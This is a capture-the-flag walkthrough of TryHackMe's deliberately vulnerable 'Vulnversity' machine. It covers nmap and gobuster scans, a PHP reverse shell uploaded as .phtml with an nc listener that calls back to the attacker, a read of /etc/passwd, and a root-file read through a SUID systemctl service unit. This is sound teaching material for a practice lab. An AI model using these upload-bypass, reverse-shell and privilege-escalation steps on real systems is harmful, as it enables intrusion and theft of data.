Vulnversity Room WriteUp
This is my write ups for Vulnversity Room on Try Hack Me.
This room is a Walkthrough type of room
I will not go deep into why the answer is "x" or "y", that part is your job to understand what the room is trying to teach you.
Task 1 - Deploy the machine
Fire up the machine
Task 2 - Reconnaissance
Scan the box, how many ports are open?
6Default Nmap Scannmap -sC -sV $IP
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
|_http-server-header: Apache/2.4.18 (Ubuntu)
4446/tcp filtered n1-fwp
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel- From the result above we can see that there are 6 ports open and 1 port is filtered
What version of the squid proxy is running on the machine?
3.5.12Default Nmap Scannmap -sC -sV $IP
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
|_http-server-header: Apache/2.4.18 (Ubuntu)
4446/tcp filtered n1-fwp
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHow many ports will nmap scan if the flag -p-400 was used?
400Nmap Usagenmap --help | grep "\-p"
-p <port ranges>: Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9- As we can see from above, the flag
-pwill namenmapscan for a specified ports. If you want to scan for400 portsyou can use the flag-p1-400and it would be equal to-p-400
- As we can see from above, the flag
Using the nmap flag -n what will it not resolve?
DNSNmap Usagenmap --help | grep "\-n"
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]What is the most likely operating system this machine is running?
UbuntuDefault Nmap Scannmap -sC -sV $IP
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
|_http-server-header: Apache/2.4.18 (Ubuntu)
4446/tcp filtered n1-fwp
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelWhat port is the web server running on?
3333Default Nmap Scannmap -sC -sV $IP
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
|_http-server-header: Apache/2.4.18 (Ubuntu)
4446/tcp filtered n1-fwp
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Task 3 - Locating directories using GoBuster
What is the directory that has an upload form page?
/internal/Gobuster brute-force directoriesgobuster dir -u http://$IP:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/images (Status: 301) [Size: 320] [--> http://10.10.220.94:3333/images/]
/css (Status: 301) [Size: 317] [--> http://10.10.220.94:3333/css/]
/js (Status: 301) [Size: 316] [--> http://10.10.220.94:3333/js/]
/fonts (Status: 301) [Size: 319] [--> http://10.10.220.94:3333/fonts/]
/internal (Status: 301) [Size: 322] [--> http://10.10.220.94:3333/internal/]- After visit all the links above, we will see it was on
internal
- After visit all the links above, we will see it was on
Task 4 - Compromise the webserver
What is the name of the user who manages the webserver?
billFirst, update the
php-reverse-shell.phpto match yourIPandPortIf you don't know where the
php-reverse-shell.phpis, you can uselocateto find it with
Locate the php-reverse-shell.phplocate php-reverse-shell.phpUpdate the php reverse shellnano php-reverse-shell.php
$ip = 'YOUR IP'; // CHANGE THIS
$port = YOUR PORT; // CHANGE THIS- Now we change the name from
php-reverse-shell.phptophp-reverse-shell.phtml
Change name of the filemv php-reverse-shell.php php-reverse-shell.phtml- Set up a listener and active the file to make a call back to our listener and we should get a shell
Set up listenernc -nvlp YOUR PORTGo over to
http://$IP:3333/internal/uploads/php-reverse-shell.phtmlto make call backWe can upgrade the shell with
python3
Upgrade the shellwhich python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")';
export TERM=xtermcat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
bill:x:1000:1000:,,,:/home/bill:/bin/bashWhat is the user flag?
8b[REDACTED]dbGet the user flagcat /home/bill/user.txt
8b[REDACTED]db
Task 5 - Privilege Escalation
On the system, search for all SUID files. What file stands out?
/bin/systemctlFind all the SUID filesfind / -uid 0 -perm -4000 -type f 2>/dev/nul
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifsBecome root and get the last flag (/root/root.txt)
a5[REDACTED]d5- Look for a way to exploit for
systemctlon gtfobins
Exploit systemctl SUIDTF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
cat /tmp/output
a5[REDACTED]d5- Look for a way to exploit for